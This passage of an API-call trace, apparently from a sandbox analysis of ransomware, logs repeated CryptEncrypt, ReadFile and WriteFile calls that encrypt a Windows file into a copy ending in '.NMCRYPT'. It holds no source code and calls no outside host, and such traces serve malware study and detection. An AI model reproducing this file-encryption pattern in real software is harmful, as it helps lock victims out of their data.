hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.323] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.323] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.324] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0151.324] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0151.324] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad5f8) returned 1 [0151.324] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0151.324] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0151.324] wcslen (_String="\\\\?\\") returned 0x4 [0151.324] CryptDuplicateKey (in: hKey=0x9ad5f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad738) returned 1 [0151.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0151.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0151.324] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=9216) returned 1 [0151.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0151.325] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.326] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.326] GetLastError () returned 0x0 [0151.326] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.331] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.331] GetLastError () returned 0x0 [0151.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.331] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.331] GetLastError () returned 0x0 [0151.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.331] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.331] GetLastError () returned 0x0 [0151.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.331] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.331] GetLastError () returned 0x0 [0151.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.331] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.331] GetLastError () returned 0x0 [0151.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.331] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.331] GetLastError () returned 0x0 [0151.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.332] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.332] GetLastError () returned 0x0 [0151.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.332] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.332] GetLastError () returned 0x0 [0151.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.332] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.332] GetLastError () returned 0x0 [0151.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.332] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.332] GetLastError () returned 0x0 [0151.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.332] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.332] GetLastError () returned 0x0 [0151.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.332] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.332] GetLastError () returned 0x0 [0151.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.332] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.332] GetLastError () returned 0x0 [0151.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.333] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.333] GetLastError () returned 0x0 [0151.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.333] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.333] GetLastError () returned 0x0 [0151.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.333] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.333] GetLastError () returned 0x0 [0151.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.333] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.333] GetLastError () returned 0x0 [0151.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.333] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.333] GetLastError () returned 0x0 [0151.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.333] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.334] GetLastError () returned 0x0 [0151.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.334] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.334] GetLastError () returned 0x0 [0151.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.334] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.334] GetLastError () returned 0x0 [0151.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.334] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.334] GetLastError () returned 0x0 [0151.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.334] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.334] GetLastError () returned 0x0 [0151.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.334] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.334] GetLastError () returned 0x0 [0151.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.334] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.334] GetLastError () returned 0x0 [0151.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.335] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.335] GetLastError () returned 0x0 [0151.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 